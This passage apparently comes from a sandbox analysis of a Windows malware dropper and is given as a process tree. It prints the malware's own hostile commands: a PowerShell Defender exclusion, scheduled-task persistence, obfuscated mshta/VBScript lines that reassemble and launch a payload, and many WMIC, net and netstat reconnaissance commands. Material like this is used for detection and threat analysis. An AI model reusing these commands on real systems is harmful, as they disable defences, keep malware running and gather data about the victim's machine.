                                                                                                        "C:\Users\Admin\AppData\Local\Temp\ae255cbe-a852-4ebc-a4c0-ae36f9909b53\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ae255cbe-a852-4ebc-a4c0-ae36f9909b53\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                        8⤵
                                                                                                          PID:5588
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ae255cbe-a852-4ebc-a4c0-ae36f9909b53\AdvancedRun.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ae255cbe-a852-4ebc-a4c0-ae36f9909b53\AdvancedRun.exe" /SpecialRun 4101d8 5588
                                                                                                            9⤵
                                                                                                              PID:5720
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\O6M6unoOXZhwtglpcijP_SBZ.exe" -Force
                                                                                                            8⤵
                                                                                                              PID:5928
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\O6M6unoOXZhwtglpcijP_SBZ.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\O6M6unoOXZhwtglpcijP_SBZ.exe"
                                                                                                              8⤵
                                                                                                                PID:6708
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\B0LFEqYNWu1_tojtFvbHEvK1.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\B0LFEqYNWu1_tojtFvbHEvK1.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:5476
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\CV75f_57Si_n3_1n6VktKnRj.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\CV75f_57Si_n3_1n6VktKnRj.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:5296
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                8⤵
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:5020
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                8⤵
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:7024
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\AhRPG9VHffDHWjukcRLRFNYJ.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\AhRPG9VHffDHWjukcRLRFNYJ.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:6008
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\MiwwgtUuLswOydefhUjTdv3B.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\MiwwgtUuLswOydefhUjTdv3B.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:6052
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\jeFfgStyBHySLzRqqSselEEW.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\jeFfgStyBHySLzRqqSselEEW.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5696
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\amEVy1T9RL6UlAQo4H8nqa1W.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\amEVy1T9RL6UlAQo4H8nqa1W.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4516
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Sat01d42d6cf82db.exe
                                                                                                          5⤵
                                                                                                            PID:3428
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01d42d6cf82db.exe
                                                                                                              Sat01d42d6cf82db.exe
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:3056
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01d42d6cf82db.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01d42d6cf82db.exe
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:800
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c Sat01f932a994dbc6.exe
                                                                                                            5⤵
                                                                                                              PID:1492
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01f932a994dbc6.exe
                                                                                                                Sat01f932a994dbc6.exe
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1548
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01f932a994dbc6.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01f932a994dbc6.exe" -u
                                                                                                                  7⤵
                                                                                                                    PID:3788
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Sat01519886887.exe
                                                                                                                5⤵
                                                                                                                  PID:1216
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01519886887.exe
                                                                                                                    Sat01519886887.exe
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:3500
                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                      "C:\Windows\System32\mshta.exe" vBScript: ClOsE( cReaTeOBjECt ( "wSCriPt.SHELL"). RUN ( "CMD /Q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01519886887.exe"" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01519886887.exe"" ) do taskkill -f /Im ""%~NxM"" " , 0, TRue) )
                                                                                                                      7⤵
                                                                                                                        PID:2836
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01519886887.exe" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF "" == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01519886887.exe" ) do taskkill -f /Im "%~NxM"
                                                                                                                          8⤵
                                                                                                                            PID:4024
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE
                                                                                                                              ..\BBIOhV.Exe -PTptXOWlEYbyb
                                                                                                                              9⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4200
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" vBScript: ClOsE( cReaTeOBjECt ( "wSCriPt.SHELL"). RUN ( "CMD /Q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE"" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF ""-PTptXOWlEYbyb "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE"" ) do taskkill -f /Im ""%~NxM"" " , 0, TRue) )
                                                                                                                                10⤵
                                                                                                                                  PID:4756
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF "-PTptXOWlEYbyb " == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE" ) do taskkill -f /Im "%~NxM"
                                                                                                                                    11⤵
                                                                                                                                      PID:4248
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" vbScRiPt: CLoSe ( creAtEOBJECt ( "WsCRIPt.sHeLl"). rUn ("cMD /Q /C Echo C:\Users\Admin\AppData\Local\TempNgu> Tqd1uZH.w & ECho | set /p = ""MZ"" > IRPJ4p_.E & CoPy /b /y IRPJ4p_.E+ k1OWwJBF._n + ZiENV9W.9 + TJDT~50N.T + Q3ePSE6P.B + u0zN.v+ TqD1UZH.W ..\xEULvZFM.BWq & Del /q *& StarT control ..\XEULVZFm.BWq " , 0 , TRUE ) )
                                                                                                                                    10⤵
                                                                                                                                      PID:4196
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C Echo C:\Users\Admin\AppData\Local\TempNgu> Tqd1uZH.w & ECho | set /p = "MZ" > IRPJ4p_.E & CoPy /b /y IRPJ4p_.E+ k1OWwJBF._n + ZiENV9W.9+ TJDT~50N.T + Q3ePSE6P.B + u0zN.v+ TqD1UZH.W ..\xEULvZFM.BWq &Del /q *& StarT control ..\XEULVZFm.BWq
                                                                                                                                        11⤵
                                                                                                                                          PID:5964
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" ECho "
                                                                                                                                            12⤵
                                                                                                                                              PID:5836
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>IRPJ4p_.E"
                                                                                                                                              12⤵
                                                                                                                                                PID:5888
                                                                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                                                                control ..\XEULVZFm.BWq
                                                                                                                                                12⤵
                                                                                                                                                  PID:316
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\XEULVZFm.BWq
                                                                                                                                                    13⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:4940
                                                                                                                                                    • C:\Windows\system32\RunDll32.exe
                                                                                                                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\XEULVZFm.BWq
                                                                                                                                                      14⤵
                                                                                                                                                        PID:6852
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\XEULVZFm.BWq
                                                                                                                                                          15⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:1380
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill -f /Im "Sat01519886887.exe"
                                                                                                                                              9⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4580
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c Sat01c5002407.exe
                                                                                                                                      5⤵
                                                                                                                                        PID:3100
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c Sat0119f3e03c741b02f.exe
                                                                                                                                        5⤵
                                                                                                                                          PID:1696
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat0119f3e03c741b02f.exe
                                                                                                                                            Sat0119f3e03c741b02f.exe
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:3040
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c Sat01688f54435b6.exe
                                                                                                                                          5⤵
                                                                                                                                            PID:716
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c Sat018ad0a25a7faa.exe
                                                                                                                                            5⤵
                                                                                                                                              PID:1132
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c Sat01c0e0d4fbb2ea73.exe
                                                                                                                                              5⤵
                                                                                                                                                PID:1620
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c Sat01b537da2e0af175a.exe
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:4092
                                                                                                                                        • C:\Windows\SysWOW64\help.exe
                                                                                                                                          "C:\Windows\SysWOW64\help.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                          PID:2832
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /c del "C:\Users\Admin\Pictures\Adobe Films\B0LFEqYNWu1_tojtFvbHEvK1.exe"
                                                                                                                                            3⤵
                                                                                                                                              PID:1364
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AFD5.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\AFD5.exe
                                                                                                                                            2⤵
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:5564
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            cmd
                                                                                                                                            2⤵
                                                                                                                                              PID:7060
                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                                                                                3⤵
                                                                                                                                                  PID:916
                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                  wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6880
                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                    wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6672
                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                      wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2956
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6228
                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                          wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5024
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5420
                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                              wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5416
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3604
                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                  wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4496
                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                    wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6892
                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                      wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3564
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4972
                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                          wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6676
                                                                                                                                                                          • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                            ipconfig /displaydns
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Gathers network information
                                                                                                                                                                            PID:4704
                                                                                                                                                                          • C:\Windows\system32\ROUTE.EXE
                                                                                                                                                                            route print
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5124
                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                              netsh firewall show state
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5684
                                                                                                                                                                              • C:\Windows\system32\systeminfo.exe
                                                                                                                                                                                systeminfo
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Gathers system information
                                                                                                                                                                                PID:6028
                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                tasklist /v
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                PID:6504
                                                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                                                net accounts /domain
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:6684
                                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                                    C:\Windows\system32\net1 accounts /domain
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:4296
                                                                                                                                                                                  • C:\Windows\system32\net.exe
                                                                                                                                                                                    net share
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1484
                                                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                                                        C:\Windows\system32\net1 share
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:7156
                                                                                                                                                                                      • C:\Windows\system32\net.exe
                                                                                                                                                                                        net user
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4176
                                                                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                                                                            C:\Windows\system32\net1 user
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:5908
                                                                                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                                                                                            net user /domain
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5792
                                                                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                                                                C:\Windows\system32\net1 user /domain
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:6412
                                                                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                                                                net use
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                PID:4864
                                                                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                                                                net group
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5096
                                                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                                                    C:\Windows\system32\net1 group
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4516
                                                                                                                                                                                                • C:\Windows\system32\net.exe
                                                                                                                                                                                                  net localgroup
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4396
                                                                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                                                                      C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5260
                                                                                                                                                                                                    • C:\Windows\system32\NETSTAT.EXE
                                                                                                                                                                                                      netstat -r
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Gathers network information
                                                                                                                                                                                                      PID:1048
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "C:\Windows\system32\route.exe" print
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3680
                                                                                                                                                                                                          • C:\Windows\system32\ROUTE.EXE
                                                                                                                                                                                                            C:\Windows\system32\route.exe print
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:6084
                                                                                                                                                                                                        • C:\Windows\system32\NETSTAT.EXE
                                                                                                                                                                                                          netstat -nao
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Gathers network information
                                                                                                                                                                                                          PID:432
                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                          schtasks /query
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4464
                                                                                                                                                                                                          • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                            ipconfig /all
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Gathers network information
                                                                                                                                                                                                            PID:2136
                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                          • outlook_office_path
                                                                                                                                                                                                          • outlook_win_path
                                                                                                                                                                                                          PID:4496
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4924
                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                            • C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:6204
                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                              PID:3172
                                                                                                                                                                                                              • C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3916
                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                PID:4892
                                                                                                                                                                                                                • C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4252
                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                  PID:3068
                                                                                                                                                                                                                  • C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5900
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                    PID:2264
                                                                                                                                                                                                                    • C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2568
                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                      PID:2828
                                                                                                                                                                                                                      • C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5696
                                                                                                                                                                                                                      • C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\Vaxd0i20\helptdxtih8.exe"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2752
                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2708
                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          PID:2692
                                                                                                                                                                                                                          • C:\Windows\system32\wbem\WMIADAP.EXE
                                                                                                                                                                                                                            wmiadap.exe /F /T /R
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:1164
                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:2580
                                                                                                                                                                                                                          • c:\windows\system32\taskhostw.exe
                                                                                                                                                                                                                            taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2464
                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:2380
                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:2372
                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2300
                                                                                                                                                                                                                                  • c:\windows\system32\sihost.exe
                                                                                                                                                                                                                                    sihost.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2292
                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:1880
                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:1396
                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1256
                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
